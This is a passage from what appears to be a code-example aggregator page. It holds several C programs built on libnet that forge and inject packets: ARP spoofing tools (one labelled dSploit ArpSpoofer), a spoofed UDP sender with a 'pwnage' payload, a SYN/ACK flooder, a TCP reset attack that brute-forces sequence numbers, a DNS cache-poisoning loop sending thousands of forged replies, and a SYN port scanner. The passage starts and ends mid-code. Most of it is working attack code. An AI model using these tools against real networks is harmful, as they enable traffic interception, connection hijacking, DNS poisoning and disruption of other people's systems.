			if (scan_prefix) {
				*scan_prefix = '\0';
				scan_prefix_length = atoi(scan_prefix+1);
				if (scan_prefix_length < 0 || scan_prefix_length > 32) {
					usage();
				}
			}
			n_scan_hosts += (1<<(32-scan_prefix_length));
			/* we need some more memory to store the target data */
			int mem = (argc+1 + n_scan_hosts) * sizeof(struct host);
			hosts = realloc( hosts, mem );
			hosts[n_hosts].ip = (uint32_t)0;
			subnet_add(inet_addr(optarg), scan_prefix_length, HOST_TARGET);
			break;
		case 'c':
			cleanup_src = optarg;
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;
	
	if (!cleanup_src || strcmp(cleanup_src, "own")==0) { /* default! */
		/* only use our own hw address when cleaning up,
		 * not jeopardizing any bridges on the way to our
		 * target
		 */
		cleanup_src_own = 1;
		cleanup_src_host = 0;
	} else if (strcmp(cleanup_src, "host")==0) {
		/* only use the target hw address when cleaning up;
		 * this can screw up some bridges and scramble access
		 * for our own host, however it resets the arp table
		 * more reliably
		 */
		cleanup_src_own = 0;
		cleanup_src_host = 1;
	} else if (strcmp(cleanup_src, "both")==0) {
		cleanup_src_own = 1;
		cleanup_src_host = 1;
	} else {
		errx(1, "Invalid parameter to -c: use 'own' (default), 'host' or 'both'.");
		usage();
	}

	while (argc--) {
		if ((target_addr = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) {
			errx(1, "Invalid address: %s", argv[0]);
			usage();
		}
		host_add(target_addr, HOST_MODEL);
		argv++;
	}

	if (poison_mesh) {
		struct host *host = hosts;
		for(;host->ip; host++) {
			host->flags |= (HOST_TARGET|HOST_MODEL);
		}
	}

	if (poison_reverse && active_targets() <= 0) {
		errx(1, "Spoofing the reverse path (-r) is only available when specifying at least one target (-t/-s).");
		usage();
	}

	if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
		errx(1, "%s", pcap_ebuf);
	
	if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
		errx(1, "%s", libnet_ebuf);

	fprintf(stderr, "Scanning %d hw addresses...\n", n_hosts);
	struct host *target = hosts;
	for (; target->ip; target++) {
		if (verbose) {
			fprintf(stderr, "Looking up host %s...\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
		}
		int arp_status = arp_find(target->ip, &target->mac);
		if (arp_status &&
				/* just make sure we are not getting an empty or broadcast address */
				(memcmp(&target->mac, zero_ha, sizeof(struct ether_addr)) != 0) &&
				(memcmp(&target->mac, brd_ha, sizeof(struct ether_addr)) != 0)) {
			target->flags |= HOST_ACTIVE;
			if (target->flags & HOST_SUBNET) {
				fprintf(stderr, "Found host in subnet %s: %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE), ether_ntoa((struct ether_addr *)&target->mac));
			}
		} else {
			target->flags &= (~HOST_ACTIVE);
			if (! (target->flags & HOST_SUBNET)) {
				fprintf(stderr, "Unable to find specified host %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
			}
			if (poison_reverse && target->flags & HOST_MODEL) {
				errx(1, "couldn't arp for spoof host %s",
					libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
				usage();
			}
		}
	}


	if ((my_ha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) {
		errx(1, "Unable to determine own mac address");
	}

	if (active_targets() == 0) {
		errx(1, "No target hosts found.");
	}

	signal(SIGHUP, cleanup);
	signal(SIGINT, cleanup);
	signal(SIGTERM, cleanup);

	fprintf(stderr, "Starting spoofing process...\n");
	for (;;) {
		struct host *target = hosts;
		for(;target->ip; target++) {
			if (!(target->flags & HOST_TARGET)) continue;
			if (!(target->flags & HOST_ACTIVE)) continue;
			struct host *model = hosts;
			for (;model->ip; model++) {
				if (!(model->flags & HOST_ACTIVE)) continue;
				if (!(model->flags & HOST_MODEL)) continue;
				if (target->ip != model->ip) {
					arp_send(l, ARPOP_REPLY, my_ha, model->ip,
						(target->ip ? (u_int8_t *)&target->mac : brd_ha),
						target->ip,
						my_ha);
					usleep(ARP_PAUSE);
					if (poison_reverse) {
						arp_send(l, ARPOP_REPLY, my_ha, target->ip, (uint8_t *)&model->mac, model->ip, my_ha);
						usleep(ARP_PAUSE);
					}
				}
			}
		}

		sleep(2);
	}
	/* NOTREACHED */

	exit(0);
}
Example #23
0
int main(int argc, char *argv[])
{
	extern char *optarg;
	extern int   optind;
	char			   pcap_ebuf[PCAP_ERRBUF_SIZE];
	char 				 libnet_ebuf[LIBNET_ERRBUF_SIZE];
	int 				 c,
			 	 	 	 	 netmask = 0,
			 	 	 	 	 ifaddr  = 0,
			 	 	 	 	 nhosts  = 0,
			 	 	 	 	 i			 = 0;
	network_entry_t *entry;

	iface			 = NULL;
	gateway_ip = target_ip = 0;

	printf( "dSploit ArpSpoofer.\n\n" );

	while( (c = getopt(argc, argv, "i:t:h?V")) != -1)
	{
		switch (c)
		{
		case 'i':
			iface = optarg;
			break;
		case 't':
			if ((target_ip = libnet_name2addr4(lnet, optarg, LIBNET_RESOLVE)) == -1)
				exit(1);
			break;
		default:
			return 1;
		}
	}
	argc -= optind;
	argv += optind;

	if (argc != 1)
		return 1;

	if( ( gateway_ip = libnet_name2addr4( lnet, argv[0], LIBNET_RESOLVE ) ) == -1 )
	{
		printf( "[ERROR] Unable to resolve gateway ip.\n" );
		return 1;
	}

	if( iface == NULL && (iface = pcap_lookupdev(pcap_ebuf)) == NULL )
	{
		printf( "[ERROR] Unable to lookup network interface ( %s ).\n", pcap_ebuf );
		return 1;
	}

	if( ( lnet = libnet_init(LIBNET_LINK, iface, libnet_ebuf) ) == NULL )
	{
		printf( "[ERROR] Unable to initialize libnet ( %s ).\n", libnet_ebuf );
		return 1;
	}

	signal( SIGHUP, cleanup );
	signal( SIGINT, cleanup );
	signal( SIGTERM, cleanup );

	our_mac = ( struct ether_addr * )libnet_get_hwaddr( lnet );
	if( our_mac == NULL )
	{
		printf( "[ERROR] Unable to retrieve local hardware address libnet ( %s ).\n", libnet_geterror( lnet ) );
		return 1;
	}

	if( net_get_details( iface, &netmask, &ifaddr, &nhosts ) != 0 )
		exit( 1 );

	printf( "netmask = %s\n", inet_ntoa( *( struct in_addr *)&netmask ) );
	printf( "ifaddr  = %s\n", inet_ntoa( *( struct in_addr *)&ifaddr ) );
	printf( "gateway = %s\n", inet_ntoa( *( struct in_addr *)&gateway_ip ) );
	printf( "hosts   = %d\n", nhosts );

	// force the arp cache to be populated
	net_wake( iface, nhosts, ifaddr, netmask, gateway_ip );

	// if the target is the gateway itself, we switch to subnet mode,
	// otherwise if the target was set, we are in single ip spoofing mode.
	if( target_ip != 0 && target_ip != gateway_ip )
	{
		if( target_ip != 0 && arp_lookup( target_ip, &target_mac, iface ) != 0 )
		{
			printf( "[ERROR] Couldn't find a cached MAC address for %s, try to wait a little bit and then try again or restart the network discovery.\n", libnet_addr2name4(target_ip, LIBNET_DONT_RESOLVE) );
			return 1;
		}

		printf( "\nSingle target mode.\n" );

		while( killed == 0 )
		{
			arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&target_mac, target_ip );
			sleep(1);
		}
	}
	// whole network spoofing
	else
	{
		printf( "\nSubnet mode.\n" );

		netmap = net_get_mapping( iface, nhosts, ifaddr, netmask, gateway_ip, &i );

		if( i == 0 )
		{
			printf( "[ERROR] No alive endpoints found.\n" );
			return 1;
		}

		while( killed == 0 )
		{
			for( i = 1; i <= nhosts && killed == 0; i++ )
			{
				target_ip = ( ifaddr & netmask ) | htonl(i);

				entry = hashmapGet( netmap, (void *)target_ip );
				if( entry && killed == 0 )
				{
					arp_send( lnet, ARPOP_REPLY, (unsigned char *)our_mac, gateway_ip, (unsigned char *)&entry->mac, target_ip );
				}
			}

			sleep(1);
		}

	}

	return 0;
}
Example #24
0
int main(int argc, char **argv)
{
    char errbuf[LIBNET_ERRBUF_SIZE];
    libnet_t *l;
    int c;
    u_char *buf;
    int packet_len = 0;
    struct ip *IP;
    struct udphdr *UDP;
    u_int32_t src = 0, dst = 0;


    banner();

    if (argc < 3) usage(argv[0]);

    if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
        fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
        exit(-1);
    }

    if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
        fprintf(stderr, "[!] Unresolved source address.\n");
        exit(-1);
    }
    if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
        fprintf(stderr, "[!] Unresolved destination address.\n");
        exit(-1);
    }

    if ((buf = malloc(IP_MAXPACKET)) == NULL) {
        perror("malloc");
        exit(-1);
    }

    UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);

    packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;

    srand(time(NULL));
    IP = (struct ip *) buf;
    IP->ip_v    = 4;                   /* version 4 */
    IP->ip_hl   = 5;		     /* header length */
    IP->ip_tos  = 0;                   /* IP tos */
    IP->ip_len  = htons(packet_len);   /* total length */
    IP->ip_id   = rand();              /* IP ID */
    IP->ip_off  = htons(0);            /* fragmentation flags */
    IP->ip_ttl  = 64;                  /* time to live */
    IP->ip_p    = IPPROTO_UDP;         /* transport protocol */
    IP->ip_sum  = 0;
    IP->ip_src.s_addr = src;
    IP->ip_dst.s_addr = dst;

    UDP->uh_sport = rand();
    UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
    UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
    UDP->uh_sum = 0;

    memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);

    libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);

    if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
    {
        fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
        exit(-1);
    }

    printf("[+] Packet sent.\n");

    libnet_destroy(l);
    free(buf);
    return (0);
}
Example #25
0
int main(int argc, char *argv[])
{
    unsigned int port;
    int opt;
    unsigned long delay;
    pid_t pid;
    char *interface, *endptr;
    char libnet_ebuf[LIBNET_ERRBUF_SIZE];
    pcap_t *pcap;
    char pcap_expr[100];
    libnet_t *libnet;
    u_int32_t target_addr, source_addr;
    struct sigaction sa;

    interface = NULL;

    while ((opt = getopt(argc, argv, "i:")) != -1) {
        switch (opt) {
        case 'i':
            interface = optarg;
            break;
        default:
            usage();
            break;
        }
    }

    argc -= optind;
    argv += optind;

    if (argc != 3) {
        usage();
    }

    port = strtoul(argv[1], &endptr, 10);
    if ((*endptr != '\0') || port < 1 || port > 65535) {
        errx(1, "Invalid port: %s", argv[1]);
    }

    errno = 0;
    delay = strtoul(argv[2], &endptr, 10);
    if (*endptr != '\0') {
        errx(1, "invalid delay: %s", argv[2]);
    } else if ((errno == ERANGE &&
                (delay == LONG_MAX)) ||
               (errno != 0 && delay == 0)) {
        errx(1, "invalid delay (%s): %s", strerror(errno), argv[2]);
    }

    /* Initialize libnet */

    if ((libnet = libnet_init(LIBNET_RAW4, interface, libnet_ebuf)) == NULL) {
        errx(1, "couldn't initialize libnet: %s", libnet_ebuf);
    }

    if ((target_addr = libnet_name2addr4(libnet, argv[0], LIBNET_RESOLVE)) == -1) {
        errx(1, "could not resolve target %s", argv[0]);
    }

    if ((source_addr = libnet_get_ipaddr4(libnet)) == -1) {
        errx(1, "could not get local IP: %s", libnet_ebuf);
    }

    /* Initialize pcap */
    snprintf(pcap_expr, 99, "tcp and tcp[tcpflags] == 18 and src host %s and port %s",
             argv[0], argv[1]);
    if ((pcap = pcap_init(interface, pcap_expr, 64)) == NULL)
        errx(1, "couldn't initialize sniffing");

    if ((pcap_off = pcap_dloff(pcap)) < 0)
        errx(1, "couldn't determine link layer offset");

    /* Fork */

    pid = fork();
    if (pid == -1)
        errx(1, "fork failed");
    else if (pid == 0)
        send_syns(libnet, source_addr, target_addr, port, delay);
    else {
        child_pid = pid;
        sa.sa_handler = &handle_signal;
        sigaction(SIGINT, &sa, NULL);
        sigaction(SIGQUIT, &sa, NULL);
        sigaction(SIGTERM, &sa, NULL);

        send_acks(pcap, libnet);
    }

    return EXIT_SUCCESS;

}
Example #26
0
void frag_and_send(u_int8_t *payload, u_int32_t total_pload_size) {

    /* Builds and sends the first packet, calling get_sum() to
     *    * get the correct checksum for the ICMP packet (with the
     *       * whole payload). Then builds and sends IP fragments
     *          * until all the payload is sent. */

    char ip_addr_str[16];
    u_int32_t ip_addr, src_addr;
    u_int16_t id, seq, ip_id;
    /* hdr_offset = fragmentation flags + offset (in bytes)
     *    * divided by 8 */
    int pload_offset, hdr_offset;
    int bytes_written, max_pload_size, packet_pload_size;
    libnet_ptag_t ip_tag;

    /* Generating random IDs */

    id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
    /* We need a non-zero id number for the IP headers,
     *    * otherwise libnet will increase it after each
     *       * build_ipv4, breaking the fragments */
    ip_id = (u_int16_t)libnet_get_prand(LIBNET_PR16);

    seq = 1;

    /* Getting IP addresses */

    src_addr = libnet_get_ipaddr4(l);
    if (src_addr == -1) {
        fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
        libnet_destroy(l);
        exit(EXIT_FAILURE);
    }

    printf("Destination IP address: ");
    scanf("%15s", ip_addr_str);

    ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);

    if (ip_addr == -1) {
        fprintf(stderr, "Error converting IP address.\n");
        libnet_destroy(l);
        exit(EXIT_FAILURE);
    }

    /* Getting max payload size */

    max_pload_size = (MTU - LIBNET_IPV4_H);
    /* making it a multiple of 8 */
    max_pload_size -= (max_pload_size % 8);

    pload_offset = 0;

    /* Building the first packet, which carries the ICMP
     *    * header */

    /* We're doing (payload size - icmp header size) and not
     *    * checking if it's a multiple of 8 because we know the
     *       * header is 8 bytes long */
    if (total_pload_size > (max_pload_size - LIBNET_ICMPV4_ECHO_H)) {
        hdr_offset = IP_MF;
        packet_pload_size = max_pload_size - LIBNET_ICMPV4_ECHO_H;
    } else {
        hdr_offset = 0;
        packet_pload_size = total_pload_size;
    }

    /* ICMP header */
    if (libnet_build_icmpv4_echo(ICMP_ECHO, 0,
                                 get_sum(payload, total_pload_size, id, seq), id,
                                 seq, payload, packet_pload_size, l, 0) == -1) {
        fprintf(stderr, "Error building ICMP header: %s\n", libnet_geterror(l));
        libnet_destroy(l);
        exit(EXIT_FAILURE);
    }

    /* First IP header (no payload, offset == 0) */
    if (libnet_build_ipv4(
                (LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + packet_pload_size), 0, ip_id,
                hdr_offset, 255, IPPROTO_ICMP, 0, src_addr, ip_addr, NULL, 0, l,
                0) == -1) {
        fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
        libnet_destroy(l);
        exit(EXIT_FAILURE);
    }

    /* Writing packet */

    bytes_written = libnet_write(l);

    if (bytes_written != -1)
        printf("%d bytes written.\n", bytes_written);
    else
        fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));

    /* Updating the offset */
    pload_offset += packet_pload_size;

    /* Clearing */
    /* We need to get rid of the ICMP header to build the
     *    * other fragments */
    libnet_clear_packet(l);

    ip_tag = LIBNET_PTAG_INITIALIZER;

    /* Looping until all the payload is sent */
    while (total_pload_size > pload_offset) {

        /* Building IP header */

        /* checking if there will be more fragments */
        if ((total_pload_size - pload_offset) > max_pload_size) {
            /* In IP's eyes, the ICMP header in the first packet
             *         needs to be in the offset, so we add its size to
             *                the payload offset here */
            hdr_offset = IP_MF + (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
            packet_pload_size = max_pload_size;
        } else {
            /* See above */
            hdr_offset = (pload_offset + LIBNET_ICMPV4_ECHO_H) / 8;
            packet_pload_size = total_pload_size - pload_offset;
        }

        ip_tag = libnet_build_ipv4((LIBNET_IPV4_H + max_pload_size), 0, ip_id,
                                   hdr_offset, 255, IPPROTO_ICMP, 0, src_addr,
                                   ip_addr, (payload + pload_offset),
                                   packet_pload_size, l, ip_tag);

        if (ip_tag == -1) {
            fprintf(stderr, "Error building IP header: %s\n", libnet_geterror(l));
            libnet_destroy(l);
            exit(EXIT_FAILURE);
        }

        /* Writing packet */

        bytes_written = libnet_write(l);

        if (bytes_written != -1)
            printf("%d bytes written.\n", bytes_written);
        else
            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));

        /* Updating the offset */
        pload_offset += packet_pload_size;
    }
}
Example #27
0
int main(int argc, char **argv)
{
  char *srv_addr;
  char *srv_port;
  char *cli_addr;
  char *cli_port;
  
  libnet_t *attack;
  u_int32_t srv_ip_addr, cli_ip_addr, seq_num;
  libnet_ptag_t ip_tag, tcp_tag;
  char *error_msg = "Error";

  if(argc >= 2) {
      cli_addr = argv[1];
  } else {
      cli_addr = "127.0.0.1";
  }
    
  if(argc >= 3) {
      cli_port = argv[2];
  } else {
      cli_port = "10001";
  }
  
  if (argc >= 4) {
      srv_addr = argv[3];
  } else {
      srv_addr = "127.0.0.1";
  }
  
  if (argc >= 5) {
      srv_port = argv[4];
  }
  else {
      srv_port = "9999";
  }
 
 seq_num = 1200000000;
 ip_tag=0;
 tcp_tag=0;
 attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); 	// 2nd parameter device may have to be changed
 
 srv_ip_addr = libnet_name2addr4(attack, srv_addr, LIBNET_DONT_RESOLVE);
 cli_ip_addr = libnet_name2addr4(attack, cli_addr, LIBNET_DONT_RESOLVE);

 //atoi(cli_port);
 //atoi(srv_port);

 libnet_build_tcp( atoi(cli_port),    /* src port */			//problem
                   atoi(srv_port),    /* destination port */		//problem
                  seq_num,    /* sequence number */
                  0,    /* acknowledgement */
                  TH_RST,    /* control flags */
                  7,    /* window */
                  0,    /* checksum - 0 = autofill */
                  0,    /* urgent */
                  LIBNET_TCP_H,    /* header length */
                  NULL,    /* payload */
                  0,    /* payload length */
                  attack,    /* libnet context */
                  tcp_tag);    /* protocol tag */
 
 libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H,    /* length */
                0,    /* TOS */
                libnet_get_prand (LIBNET_PRu16),    /* IP ID */
                0,    /* frag offset */
                127,    /* TTL */
                IPPROTO_TCP,    /* upper layer protocol */
                0,    /* checksum, 0=autofill */
                cli_ip_addr,    /* src IP */
                srv_ip_addr,    /* dest IP */
                NULL,    /* payload */
                0,    /* payload len */
                attack,    /* libnet context */
                ip_tag);    /* protocol tag */

 printf("starting reset attack on TCP connection: client %s:%s, server %s:%s\n",
		  cli_addr, cli_port, srv_addr, srv_port);
 printf("Libnet value: %d: %u\nServer Port: %s\nClient Port: %s", libnet_write(attack), seq_num, srv_port, cli_port);

 //libnet_write(attack)
 libnet_destroy(attack);
 
 for(seq_num = (1200000000-16384); seq_num>0; seq_num=(seq_num-16384))
  {
   attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); 	// 2nd parameter device may have to be changed
 
   libnet_build_tcp(atoi(cli_port), atoi(srv_port), seq_num,
                    0, TH_RST, 7,0, 0, LIBNET_TCP_H,  NULL,  0, attack, tcp_tag);
   libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, libnet_get_prand (LIBNET_PRu16), 0, 127, IPPROTO_TCP,  
 	        0, cli_ip_addr, srv_ip_addr, NULL, 0, attack, ip_tag);

   //libnet_write(attack);
   //printf("Libnet value: %d: %d\n", libnet_write(attack), seq_num);
   libnet_write(attack);
   libnet_destroy(attack);
   	
  }

 printf("Test3");		//attack successful
 //libnet_destroy(attack);
 return 0; 
}
Example #28
0
int
main(int argc, char *argv[])
{
    /*
     *  Initialize the library.  Root priviledges are required.
     */

    l = libnet_init(
            LIBNET_LINK,                             /* injection type */
            // NULL,                                    /* network interface eth0, eth1, etc. NULL is default.*/
	   "eth11",                                /* network interface eth0, eth1, etc. NULL is default.*/
            errbuf);                                 /* error buffer */

    if (l == NULL)
    {
        fprintf(stderr, "libnet_init() failed: %s", errbuf);
        exit(EXIT_FAILURE); 
    }
	
/*  src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;
    payload = NULL;
    payload_s = 0;
*/
    while ((c = getopt (argc, argv, "p:t:i:e:")) != EOF)
    {
        switch (c)
        {
            case 'p':
                strcpy(payload_file, optarg);
                break;
            case 't':
                strcpy(tcp_file, optarg);
                break;
            case 'i':
                strcpy(ip_file, optarg);
                break;
            case 'e':
                strcpy(eth_file, optarg);
                break;
            default:
                break;
        }
    }

    if (optind != 9)
    {    
        usage();
        exit(0);
    }
    
    i_dns_bind2_addr = libnet_name2addr4(l, dns_bind2_addr, LIBNET_RESOLVE);
    sscanf("08, 00, 27, 90, 31, 81", "%x, %x, %x, %x, %x, %x", &res_eth_saddr[0], &res_eth_saddr[1], &res_eth_saddr[2], &res_eth_saddr[3], &res_eth_saddr[4], &res_eth_saddr[5]);

    srand((int)time(0));
    int loop_counter = 0;
    while (1==1) {
        int randomNumber = (rand()%10000000);
        while (randomNumber<1000000) randomNumber*=10;
        sprintf(random_host, ".x-%d.%s", randomNumber,attack_domain);
        printf("\nNow attacking with domain %s \n",random_host);
        convertDomain();

        // load_payload();
        load_payload_query(); // get the new payload with random subdomain
        load_ethernet();
        load_tcp_udp();
        load_ip();
        convert_proto();

        if(ip_proto_val==IPPROTO_TCP){    
            t = libnet_build_tcp(
                t_src_port,                                    /* source port */
                t_des_port,                                    /* destination port */
                t_seq,                                         /* sequence number */
                t_ack,                                         /* acknowledgement num */
                t_control_val,                                 /* control flags */
                t_win,                                         /* window size */
                0,                                             /* checksum */
                t_urgent,                                      /* urgent pointer */
                LIBNET_TCP_H + payload_filesize,               /* TCP packet size */
            payload_location,                              /* payload */
                payload_filesize,                              /* payload size */
                l,                                             /* libnet handle */
                0);                                            /* libnet id */
            head_type = LIBNET_TCP_H;
            if (t == -1)
            {
                fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
                goto bad;
            }
        }
 
        if(ip_proto_val==IPPROTO_UDP){
                t = libnet_build_udp(
                t_src_port,                                /* source port */
                t_des_port,                                /* destination port */
                LIBNET_UDP_H + payload_filesize,           /* packet length */
                0,                                         /* checksum */
                payload_location,                          /* payload */
                payload_filesize,                          /* payload size */
                l,                                         /* libnet handle */
                0);                                        /* libnet id */
            head_type = LIBNET_UDP_H;
            if (t == -1)
            {
                fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
                goto bad;
            }
        }


        t = libnet_build_ipv4(
    /*        LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s,          length */
            LIBNET_IPV4_H + head_type + payload_filesize,          /* length */
        i_ttos_val,                                            /* TOS */
            i_id,                                                  /* IP ID */
            i_frag,                                                /* IP Frag */
            i_ttl,                                                 /* TTL */
            ip_proto_val,                                          /* protocol */
            0,                                                     /* checksum */
            i_src_addr,                                            /* source IP */
            i_des_addr,                                            /* destination IP */
            NULL,                                                  /* payload */
            0,                                                     /* payload size */
            l,                                                     /* libnet handle */
            0);                                                    /* libnet id */
        if (t == -1)
        {
            fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
            goto bad;
        }

        t = libnet_build_ethernet(
            eth_daddr,                                   /* ethernet destination */
            eth_saddr,                                   /* ethernet source */
            e_proto_val,                                 /* protocol type */
            NULL,                                        /* payload */
            0,                                           /* payload size */
            l,                                           /* libnet handle */
            0);                                          /* libnet id */
        if (t == -1)
        {
            fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
            goto bad;
        }
         /* 
         *  Write it to the wire.
         */
        c = libnet_write(l);
        // sending the request to the DNS server
        free(payload_location);
        libnet_destroy(l);
        // reinit the handle so that we can set new parameters to the handle.

    for (i=0;i<10000;i++) { // loop to send 10000 responses for each request.
        l = libnet_init(
        LIBNET_LINK,                             /* injection type */
        // NULL,                                    /* network interface eth0, eth1, etc. NULL is default.*/
        "eth11",                                /* network interface eth0, eth1, etc. NULL is default.*/
        errbuf);                                 /* error buffer */

        // reinit the handle for sending responses
        if (l == NULL)
        {
            fprintf(stderr, "libnet_init() failed: %s", errbuf);
            exit(EXIT_FAILURE); 
        }

        load_payload_answer();
        // generate the response and send it

        // change the ports of source port and destination port to match the second DNS query
        if(ip_proto_val==IPPROTO_UDP){
                t = libnet_build_udp(
                t_des_port,                                /* source port */
                t_src_port,                                /* destination port */
                LIBNET_UDP_H + payload_filesize,           /* packet length */
                0,                                         /* checksum */
                payload_location,                          /* payload */
                payload_filesize,                          /* payload size */
                l,                                         /* libnet handle */
                0);                                        /* libnet id */
            head_type = LIBNET_UDP_H;
            if (t == -1)
            {
                fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
                goto bad;
            }
        }

        // change the ethernet headers to match the response from the second DNS server
        t = libnet_build_ipv4(
         /*        LIBNET_IPV4_H + LIBNET_TCP_H + 20 + payload_s,          length */
            LIBNET_IPV4_H + head_type + payload_filesize,          /* length */
        i_ttos_val,                                            /* TOS */
            i_id,                                                  /* IP ID */
            i_frag,                                                /* IP Frag */
            i_ttl,                                                 /* TTL */
            ip_proto_val,                                          /* protocol */
            0,                                                     /* checksum */
            i_dns_bind2_addr,                                            /* source IP */
            i_des_addr,                                            /* destination IP */
            NULL,                                                  /* payload */
            0,                                                     /* payload size */
            l,                                                     /* libnet handle */
            0);                                                    /* libnet id */
        if (t == -1)
        {
            fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
            goto bad;
        }

        t = libnet_build_ethernet(
            eth_daddr,                                   /* ethernet destination */
            res_eth_saddr,                                   /* ethernet source */
            e_proto_val,                                 /* protocol type */
            NULL,                                        /* payload */
            0,                                           /* payload size */
            l,                                           /* libnet handle */
            0);                                          /* libnet id */
        if (t == -1)
        {
            fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
            goto bad;
        }
         /* 
         *  Write it to the wire.
         */
        c = libnet_write(l);
        printf("****  %d packets sent  **** (packetsize: %d bytes each)\n",eth_pktcount,c);  /* tell them what we just did */
        free(payload_location);
        libnet_destroy(l);

    }


        l = libnet_init(
        LIBNET_LINK,                             /* injection type */
        // NULL,                                    /* network interface eth0, eth1, etc. NULL is default.*/
        "eth11",                                /* network interface eth0, eth1, etc. NULL is default.*/
        errbuf);                                 /* error buffer */

        if (l == NULL)
        {
            fprintf(stderr, "libnet_init() failed: %s", errbuf);
            exit(EXIT_FAILURE); 
        }
        



        loop_counter++;
        printf("%d\n", loop_counter);
            if(loop_counter == 2){
                break;
            }
            // loop to do for multiple unique requests

    }

    /* give the buf memory back */
    // clear memory 
    libnet_destroy(l);
    return 0;
bad:
    libnet_destroy(l);
    return (EXIT_FAILURE);

// clear memory on failure
}
Example #29
0
void sendsyns ()
{
   libnet_t *l;
   char errbuf[LIBNET_ERRBUF_SIZE];
   u_long ip;
   libnet_ptag_t tcp_pkt = LIBNET_PTAG_INITIALIZER;
   libnet_ptag_t ip_pkt;
   u_long dst_ip;
   int  count = 0;
   char *payload = "";		// put your love note here.
   u_short payload_s = strlen (payload);
   int  currentport = opts.low_port;
   int  build_header = 1;

   /* 
    * pcap may be slow to initialize, so let's wait a second. 
    */
   sleep (1);

   /* 
    * initialize libnet for raw IP packets.  libnet will
    *  find an appropriate interface. 
    */
   l = libnet_init (LIBNET_RAW4, NULL, errbuf);
   if (l == NULL) {
      fprintf (stderr, "libnet_init failed: %s", errbuf);
      exit (1);
   }

   /* 
    * get the IP address of the source interface 
    */
   ip = libnet_get_ipaddr4 (l);
   if (-1 == ip) {
      fprintf (stderr, "libnet_get_ipaddr4(l) failed: ");
      fprintf (stderr, "%s\n", libnet_geterror (l));
      exit (1);
   }

   dst_ip = libnet_name2addr4 (l, (u_char *) opts.target, LIBNET_RESOLVE);
   if (-1 == dst_ip) {
      fprintf (stderr, "libnet_name2addr4() failed: ");
      fprintf (stderr, "%s\n", libnet_geterror (l));
      exit (1);
   }

   /* 
    * Build and send a SYN packet, one for each port.  The first time
    *  this loop is executed an IP packet will be constructed. 
    */
   printf ("scanning port %d through %d on %s\n",
	   opts.low_port,
	   opts.high_port, libnet_addr2name4 (dst_ip, LIBNET_DONT_RESOLVE));
   while (currentport <= opts.high_port) {
      /* 
       * Sleep a little... if we send packets too fast, some will get
       * dropped. 
       */
      usleep (50);
      /* 
       * Build the TCP packet with the SYN flag set.  A payload is 
       * optional; for automated scans it is nice to include some text
       * explaining why you are scanning (or ask first!).  Fields with
       * 0 will be calculated by libnet.  
       */
      tcp_pkt = libnet_build_tcp (opts.src_port,	// source port
				  currentport++,	// dest port
				  libnet_get_prand (LIBNET_PRu32),	// seq
				  libnet_get_prand (LIBNET_PRu32),	// ack
				  TH_SYN,	// flags
				  libnet_get_prand (LIBNET_PRu16),	// window size
				  0,	// checksum
				  0,	// urgent ptr
				  LIBNET_TCP_H + payload_s,	// packet size
				  (u_char *) payload,	// contents of packet
				  payload_s,	// size of payload
				  l,	// libnet handle
				  tcp_pkt);	// libnet id
      if (-1 == tcp_pkt) {
	 fprintf (stderr, "libnet_build_tcp() failed: ");
	 fprintf (stderr, "%s\n", libnet_geterror (l));
	 exit (1);
      }

      if (build_header) {
	 build_header = 0;
	 ip_pkt = libnet_autobuild_ipv4 (LIBNET_IPV4_H + LIBNET_TCP_H,
					 IPPROTO_TCP, dst_ip, l);
	 if (-1 == ip_pkt) {
	    fprintf (stderr, "libnet_autobuild_ipv4() failed: ");
	    fprintf (stderr, "%s\n", libnet_geterror (l));
	 }
      }

      /* 
       * Send it! 
       */
      count = libnet_write (l);
      if (-1 == count) {
	 fprintf (stderr, "libnet_write() failed: ");
